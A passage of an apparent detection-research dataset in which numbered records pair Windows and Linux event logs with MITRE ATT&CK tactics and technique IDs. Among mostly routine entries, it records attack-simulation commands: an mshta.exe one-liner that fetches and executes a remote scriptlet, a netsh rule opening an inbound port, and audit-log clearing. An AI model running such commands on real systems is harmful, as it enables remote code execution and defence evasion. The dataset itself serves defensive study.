Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Handle ID: 0x380 Process Information: Process ID: 0x1594 Process Name: C:\Windows\System32\wbem\WmiPrvSE.exe || 12. The handle to an object was closed. Subject : Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Handle ID: 0x14fc Process Information: Process ID: 0x1594 Process Name: C:\Windows\System32\wbem\WmiPrvSE.exe
58
Linux-APT-Dataset-2024
linux
21
3
Collection
T1005
2024-01-07T10:10:07.923000+03:00
2024-01-07T10:34:58.257000+03:00
1. sudo || 2. sudo || 3. sudo
59
BRAWL-Dataset
windows
mims-pc
12
Execution
T1059.001
2017-05-01T21:57:34.699000+03:00
2017-05-01T23:20:35.632000+03:00
1. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 2. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 3. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 4. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 5. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 6. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 7. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 8. "powershell" -command - || 9. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 10. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 11. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 12. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
60
OTRF-Security-Datasets-atomic
windows
MORDORDC.theshire.local
12
Persistence
T1574.001
2020-09-22T06:28:52.502000+03:00
2020-09-22T06:32:53.079000+03:00
1. Special privileges assigned to new logon. Subject: Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x6D3C611 Privileges: SeSecurityPrivilege SeBackupPrivilege SeRestorePrivilege SeTakeOwnershipPrivilege SeDebugPrivilege SeSystemEnvironmentPrivilege SeLoadDriverPrivilege SeImpersonatePrivilege SeDelegateSessionUserImpersonatePrivilege SeEnableDelegationPrivilege || 2. An account was successfully logged on. Subject: Security ID: S-1-0-0 Account Name: - Account Domain: - Logon ID: 0x0 Logon Information: Logon Type: 3 Restricted Admin Mode: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE.LOCAL Logon ID: 0x6D3C611 Linked Logon ID: 0x0 Network Account Name: || 3. An account was logged off. Subject: Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x6D3C611 Logon Type: 3 This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer. || 4. The handle to an object was closed. Subject : Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Handle ID: 0x2174 Process Information: Process ID: 0x638 Process Name: C:\Windows\System32\svchost.exe || 5. A handle to an object was requested. Subject: Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Handle ID: 0x4c4 Resource Attributes: - Process Information: Process ID: 0x638 Process Name: C:\Windows\System32\svchost.exe Access R || 6. An attempt was made to access an object. Subject: Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Handle ID: 0x4c4 Resource Attributes: - Process Information: Process ID: 0x638 Process Name: C:\Windows\System32\svchost.exe Acce || 7. The handle to an object was closed. Subject : Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Handle ID: 0x4c4 Process Information: Process ID: 0x638 Process Name: C:\Windows\System32\svchost.exe || 8. The handle to an object was closed. Subject : Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Handle ID: 0x236c Process Information: Process ID: 0x638 Process Name: C:\Windows\System32\svchost.exe || 9. A handle to an object was requested. Subject: Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Handle ID: 0x51c Resource Attributes: - Process Information: Process ID: 0x638 Process Name: C:\Windows\System32\svchost.exe Access R || 10. An attempt was made to access an object. Subject: Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Handle ID: 0x51c Resource Attributes: - Process Information: Process ID: 0x638 Process Name: C:\Windows\System32\svchost.exe Acce || 11. The handle to an object was closed. Subject : Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Handle ID: 0x51c Process Information: Process ID: 0x638 Process Name: C:\Windows\System32\svchost.exe || 12. The handle to an object was closed. Subject : Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Handle ID: 0x2174 Process Information: Process ID: 0x638 Process Name: C:\Windows\System32\svchost.exe
61
Linux-APT-Dataset-2024
linux
8
2
Execution
T1059.004
2024-01-06T20:56:36.264000+03:00
2024-01-06T20:59:26.432000+03:00
1. sh || 2. sh
62
BRAWL-Dataset
windows
santilli-pc
12
Execution
T1059.001
2017-05-01T21:58:15.254000+03:00
2017-05-01T23:21:16.081000+03:00
1. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 2. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 3. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 4. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 5. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 6. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 7. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 8. "powershell" -command - || 9. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 10. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 11. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 12. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
63
OTRF-Security-Datasets-atomic
windows
WORKSTATION5
12
Defense Evasion
T1562.004
2020-10-21T15:19:01.088000+03:00
2020-10-21T15:19:17.654000+03:00
1. The audit log was cleared. Subject: Security ID: S-1-5-21-3940915590-64593676-1414006259-500 Account Name: wardog Domain Name: WORKSTATION5 Logon ID: 0xC61D9 || 2. netsh advfirewall firewall add rule name="atomic testing" action=allow dir=in protocol=TCP localport=450 || 3. netsh advfirewall firewall add rule name="atomic testing" action=allow dir=in protocol=TCP localport=450 || 4. The handle to an object was closed. Subject : Security ID: S-1-5-21-3940915590-64593676-1414006259-500 Account Name: wardog Account Domain: WORKSTATION5 Logon ID: 0xC61D9 Object: Object Server: Security Handle ID: 0x360c Process Information: Process ID: 0x27cc Process Name: C:\Windows\System32\netsh.exe || 5. A handle to an object was requested. Subject: Security ID: S-1-5-21-3940915590-64593676-1414006259-500 Account Name: wardog Account Domain: WORKSTATION5 Logon ID: 0xC61D9 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa Handle ID: 0x90 Resource Attributes: - Process Information: Process ID: 0x27cc Process Name: C:\Windows\System32\net || 6. An attempt was made to access an object. Subject: Security ID: S-1-5-21-3940915590-64593676-1414006259-500 Account Name: wardog Account Domain: WORKSTATION5 Logon ID: 0xC61D9 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa Handle ID: 0x90 Resource Attributes: - Process Information: Process ID: 0x27cc Process Name: C:\Windows\System32 || 7. The handle to an object was closed. Subject : Security ID: S-1-5-21-3940915590-64593676-1414006259-500 Account Name: wardog Account Domain: WORKSTATION5 Logon ID: 0xC61D9 Object: Object Server: Security Handle ID: 0x90 Process Information: Process ID: 0x27cc Process Name: C:\Windows\System32\netsh.exe || 8. The handle to an object was closed. Subject : Security ID: S-1-5-21-3940915590-64593676-1414006259-500 Account Name: wardog Account Domain: WORKSTATION5 Logon ID: 0xC61D9 Object: Object Server: Security Handle ID: 0x1b5c Process Information: Process ID: 0x27cc Process Name: C:\Windows\System32\netsh.exe || 9. A handle to an object was requested. Subject: Security ID: S-1-5-21-3940915590-64593676-1414006259-500 Account Name: wardog Account Domain: WORKSTATION5 Logon ID: 0xC61D9 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Handle ID: 0x47c Resource Attributes: - Process Information: Process ID: 0x27cc Process Name: C || 10. An attempt was made to access an object. Subject: Security ID: S-1-5-21-3940915590-64593676-1414006259-500 Account Name: wardog Account Domain: WORKSTATION5 Logon ID: 0xC61D9 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Handle ID: 0x47c Resource Attributes: - Process Information: Process ID: 0x27cc Process Nam || 11. The handle to an object was closed. Subject : Security ID: S-1-5-21-3940915590-64593676-1414006259-500 Account Name: wardog Account Domain: WORKSTATION5 Logon ID: 0xC61D9 Object: Object Server: Security Handle ID: 0x47c Process Information: Process ID: 0x27cc Process Name: C:\Windows\System32\netsh.exe || 12. The handle to an object was closed. Subject : Security ID: S-1-5-19 Account Name: LOCAL SERVICE Account Domain: NT AUTHORITY Logon ID: 0x3E5 Object: Object Server: Security Handle ID: 0x37e0 Process Information: Process ID: 0xb84 Process Name: C:\Windows\System32\svchost.exe
64
Linux-APT-Dataset-2024
linux
21
2
Command and Control
T1105
2024-01-07T08:56:22.520000+03:00
2024-01-07T08:56:29.674000+03:00
1. wget || 2. ls
65
BRAWL-Dataset
windows
sespinosa-pc
12
Execution
T1059.001
2017-05-01T21:58:24.264000+03:00
2017-05-01T23:20:25.803000+03:00
1. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 2. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 3. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 4. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 5. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 6. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 7. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 8. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 9. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 10. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 11. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 12. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
66
OTRF-Security-Datasets-atomic
windows
MORDORDC.theshire.local
12
Credential Access
T1110.003
2020-10-22T11:29:51.785000+03:00
2020-10-22T11:30:42.749000+03:00
1. File created: RuleName: - UtcTime: 2020-10-22 08:29:49.562 ProcessGuid: {fddc55f3-b92a-5f8f-2000-000000000400} ProcessId: 1444 Image: C:\windows\System32\svchost.exe TargetFilename: C:\Windows\ServiceState\EventLog\Data\lastalive0.dat CreationUtcTime: 2020-10-21 04:29:30.667 || 2. C:\windows\system32\wbem\wmiprvse.exe -Embedding || 3. The handle to an object was closed. Subject : Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Handle ID: 0x2b04 Process Information: Process ID: 0x1f08 Process Name: C:\Windows\System32\wbem\WmiPrvSE.exe || 4. A handle to an object was requested. Subject: Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa Handle ID: 0xa0 Resource Attributes: - Process Information: Process ID: 0x1f08 Process Name: C:\Windows\System32\wbem\WmiPrvSE.exe Access Request Informat || 5. An attempt was made to access an object. Subject: Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa Handle ID: 0xa0 Resource Attributes: - Process Information: Process ID: 0x1f08 Process Name: C:\Windows\System32\wbem\WmiPrvSE.exe Access Request Info || 6. The handle to an object was closed. Subject : Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Handle ID: 0xa0 Process Information: Process ID: 0x1f08 Process Name: C:\Windows\System32\wbem\WmiPrvSE.exe || 7. Special privileges assigned to new logon. Subject: Security ID: S-1-5-21-2323213074-4052461197-1785501644-1104 Account Name: pgustavo Account Domain: THESHIRE Logon ID: 0x211EC28 Privileges: SeSecurityPrivilege SeBackupPrivilege SeRestorePrivilege SeTakeOwnershipPrivilege SeDebugPrivilege SeSystemEnvironmentPrivilege SeLoadDriverPrivilege SeImpersonatePrivilege SeDelegateSessionUserImpersonatePriv || 8. An account was successfully logged on. Subject: Security ID: S-1-0-0 Account Name: - Account Domain: - Logon ID: 0x0 Logon Information: Logon Type: 3 Restricted Admin Mode: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-21-2323213074-4052461197-1785501644-1104 Account Name: pgustavo Account Domain: THESHIRE.LOCAL Logon ID: 0x211EC28 Linke || 9. The handle to an object was closed. Subject : Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Handle ID: 0x2a6c Process Information: Process ID: 0x1f08 Process Name: C:\Windows\System32\wbem\WmiPrvSE.exe || 10. A handle to an object was requested. Subject: Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SOFTWARE\Microsoft\.NETFramework Handle ID: 0x344 Resource Attributes: - Process Information: Process ID: 0x1f08 Process Name: C:\Windows\System32\wbem\WmiPrvSE.exe Access Request Informa || 11. The handle to an object was closed. Subject : Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Handle ID: 0x344 Process Information: Process ID: 0x1f08 Process Name: C:\Windows\System32\wbem\WmiPrvSE.exe || 12. The handle to an object was closed. Subject : Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Handle ID: 0x2a6c Process Information: Process ID: 0x1f08 Process Name: C:\Windows\System32\wbem\WmiPrvSE.exe
67
Linux-APT-Dataset-2024
linux
8
3
Defense Evasion
T1222.002
2024-01-06T21:04:06.761000+03:00
2024-01-06T21:06:26.965000+03:00
1. sudo || 2. sudo || 3. ls
68
BRAWL-Dataset
windows
platten-pc
12
Execution
T1059.001
2017-05-01T21:58:18.081000+03:00
2017-05-01T23:20:19.898000+03:00
1. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 2. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 3. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 4. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 5. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 6. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 7. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 8. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 9. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 10. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 11. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 12. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
69
OTRF-Security-Datasets-atomic
windows
MORDORDC.theshire.local
12
Defense Evasion
T1550.002
2020-09-22T05:13:51.101000+03:00
2020-09-22T05:15:19.728000+03:00
1. Special privileges assigned to new logon. Subject: Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x6C0AE3D Privileges: SeSecurityPrivilege SeBackupPrivilege SeRestorePrivilege SeTakeOwnershipPrivilege SeDebugPrivilege SeSystemEnvironmentPrivilege SeLoadDriverPrivilege SeImpersonatePrivilege SeDelegateSessionUserImpersonatePrivilege SeEnableDelegationPrivilege || 2. An account was successfully logged on. Subject: Security ID: S-1-0-0 Account Name: - Account Domain: - Logon ID: 0x0 Logon Information: Logon Type: 3 Restricted Admin Mode: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE.LOCAL Logon ID: 0x6C0AE3D Linked Logon ID: 0x0 Network Account Name: || 3. An account was logged off. Subject: Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x6C0AE3D Logon Type: 3 This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer. || 4. The handle to an object was closed. Subject : Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Handle ID: 0x2024 Process Information: Process ID: 0x638 Process Name: C:\Windows\System32\svchost.exe || 5. A handle to an object was requested. Subject: Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Handle ID: 0x558 Resource Attributes: - Process Information: Process ID: 0x638 Process Name: C:\Windows\System32\svchost.exe Access R || 6. An attempt was made to access an object. Subject: Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Handle ID: 0x558 Resource Attributes: - Process Information: Process ID: 0x638 Process Name: C:\Windows\System32\svchost.exe Acce || 7. The handle to an object was closed. Subject : Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Handle ID: 0x558 Process Information: Process ID: 0x638 Process Name: C:\Windows\System32\svchost.exe || 8. The handle to an object was closed. Subject : Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Handle ID: 0x2510 Process Information: Process ID: 0x638 Process Name: C:\Windows\System32\svchost.exe || 9. A handle to an object was requested. Subject: Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Handle ID: 0x4c0 Resource Attributes: - Process Information: Process ID: 0x638 Process Name: C:\Windows\System32\svchost.exe Access R || 10. An attempt was made to access an object. Subject: Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Handle ID: 0x4c0 Resource Attributes: - Process Information: Process ID: 0x638 Process Name: C:\Windows\System32\svchost.exe Acce || 11. The handle to an object was closed. Subject : Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Handle ID: 0x4c0 Process Information: Process ID: 0x638 Process Name: C:\Windows\System32\svchost.exe || 12. The handle to an object was closed. Subject : Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Handle ID: 0x2024 Process Information: Process ID: 0x638 Process Name: C:\Windows\System32\svchost.exe
70
Linux-APT-Dataset-2024
linux
4294967295
11
Discovery
T1057
2024-01-03T20:03:19.002000+03:00
2024-01-07T07:49:43.465000+03:00
1. ps || 2. ps || 3. ps || 4. ps || 5. ps || 6. ps || 7. ps || 8. ps || 9. ps || 10. ps || 11. ps
71
BRAWL-Dataset
windows
peele-pc
12
Execution
T1059.001
2017-05-01T21:59:08.034000+03:00
2017-05-01T23:21:09.756000+03:00
1. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 2. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 3. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 4. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 5. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 6. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 7. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 8. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 9. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 10. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 11. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 12. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
72
OTRF-Security-Datasets-atomic
windows
WORKSTATION6.theshire.local
12
Execution
T1021.006
2020-08-06T18:56:15.213000+03:00
2020-09-21T00:10:06.964000+03:00
1. taskhostw.exe Install $(Arg0) || 2. C:\windows\servicing\TrustedInstaller.exe || 3. C:\windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.18362.957_none_5f2e9e6258ea82f2\TiWorker.exe -Embedding || 4. A handle to an object was requested. Subject: Security ID: S-1-5-18 Account Name: WORKSTATION6$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: SC Manager Object Type: SC_MANAGER OBJECT Object Name: ServicesActive Handle ID: 0x21849e4c060 Resource Attributes: - Process Information: Process ID: 0x2dc Process Name: C:\Windows\System32\services.exe Access Request Information: Transact || 5. A handle to an object was requested. Subject: Security ID: S-1-5-18 Account Name: WORKSTATION6$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: SC Manager Object Type: SC_MANAGER OBJECT Object Name: ServicesActive Handle ID: 0x21849e4c060 Resource Attributes: - Process Information: Process ID: 0x2dc Process Name: C:\Windows\System32\services.exe Access Request Information: Transact || 6. The handle to an object was closed. Subject : Security ID: S-1-5-18 Account Name: WORKSTATION6$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Handle ID: 0x3324 Process Information: Process ID: 0x4f8 Process Name: C:\Windows\System32\svchost.exe || 7. A handle to an object was requested. Subject: Security ID: S-1-5-18 Account Name: WORKSTATION6$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Session Manager\Environment Handle ID: 0x76c Resource Attributes: - Process Information: Process ID: 0x4f8 Process Name: C:\Windows\System32\svchost.exe A || 8. An attempt was made to access an object. Subject: Security ID: S-1-5-18 Account Name: WORKSTATION6$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Session Manager\Environment Handle ID: 0x76c Resource Attributes: - Process Information: Process ID: 0x4f8 Process Name: C:\Windows\System32\svchost.e || 9. The handle to an object was closed. Subject : Security ID: S-1-5-18 Account Name: WORKSTATION6$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Handle ID: 0x76c Process Information: Process ID: 0x4f8 Process Name: C:\Windows\System32\svchost.exe || 10. taskhostw.exe Install $(Arg0) || 11. The handle to an object was closed. Subject : Security ID: S-1-5-21-1363495622-3806888128-621328882-1106 Account Name: sbeavers Account Domain: THESHIRE Logon ID: 0x2B88B1 Object: Object Server: Security Handle ID: 0x3324 Process Information: Process ID: 0x1d74 Process Name: C:\Windows\System32\taskhostw.exe || 12. A handle to an object was requested. Subject: Security ID: S-1-5-21-1363495622-3806888128-621328882-1106 Account Name: sbeavers Account Domain: THESHIRE Logon ID: 0x2B88B1 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa Handle ID: 0x7c Resource Attributes: - Process Information: Process ID: 0x1d74 Process Name: C:\Windows\System32\ta
73
Linux-APT-Dataset-2024
linux
21
7
Discovery
T1083
2024-01-07T09:59:45.105000+03:00
2024-01-07T10:35:16.241000+03:00
1. pwd || 2. sudo || 3. sudo || 4. sudo || 5. sudo || 6. pwd || 7. sudo
74
BRAWL-Dataset
windows
minahan-pc
12
Execution
T1059.001
2017-05-01T21:59:22.293000+03:00
2017-05-01T23:21:27.963000+03:00
1. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 2. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 3. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 4. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 5. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 6. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 7. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 8. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 9. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 10. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 11. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 12. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
75
OTRF-Security-Datasets-atomic
windows
WORKSTATION5
12
Defense Evasion
T1218.005
2020-10-22T05:21:34.280000+03:00
2020-10-22T06:52:11.378000+03:00
1. The audit log was cleared. Subject: Security ID: S-1-5-21-3940915590-64593676-1414006259-500 Account Name: wardog Domain Name: WORKSTATION5 Logon ID: 0xC61D9 || 2. A process has exited. Subject: Security ID: S-1-5-21-3940915590-64593676-1414006259-500 Account Name: wardog Account Domain: WORKSTATION5 Logon ID: 0xC61D9 Process Information: Process ID: 0x1eb8 Process Name: C:\Windows\System32\RuntimeBroker.exe Exit Status: 0x0 || 3. mshta.exe javascript:a=(GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/mshta.sct')).Exec();close(); || 4. mshta.exe javascript:a=(GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/mshta.sct')).Exec();close(); || 5. The handle to an object was closed. Subject : Security ID: S-1-5-21-3940915590-64593676-1414006259-500 Account Name: wardog Account Domain: WORKSTATION5 Logon ID: 0xC61D9 Object: Object Server: Security Handle ID: 0x4624 Process Information: Process ID: 0x275c Process Name: C:\Windows\System32\mshta.exe || 6. A handle to an object was requested. Subject: Security ID: S-1-5-21-3940915590-64593676-1414006259-500 Account Name: wardog Account Domain: WORKSTATION5 Logon ID: 0xC61D9 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa Handle ID: 0x90 Resource Attributes: - Process Information: Process ID: 0x275c Process Name: C:\Windows\System32\msh || 7. An attempt was made to access an object. Subject: Security ID: S-1-5-21-3940915590-64593676-1414006259-500 Account Name: wardog Account Domain: WORKSTATION5 Logon ID: 0xC61D9 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa Handle ID: 0x90 Resource Attributes: - Process Information: Process ID: 0x275c Process Name: C:\Windows\System32 || 8. The handle to an object was closed. Subject : Security ID: S-1-5-21-3940915590-64593676-1414006259-500 Account Name: wardog Account Domain: WORKSTATION5 Logon ID: 0xC61D9 Object: Object Server: Security Handle ID: 0x90 Process Information: Process ID: 0x275c Process Name: C:\Windows\System32\mshta.exe || 9. File created: RuleName: - UtcTime: 2020-10-22 06:21:38.764 ProcessGuid: {39e4a257-24f1-5f91-0e13-000000000700} ProcessId: 10076 Image: C:\windows\system32\mshta.exe TargetFilename: 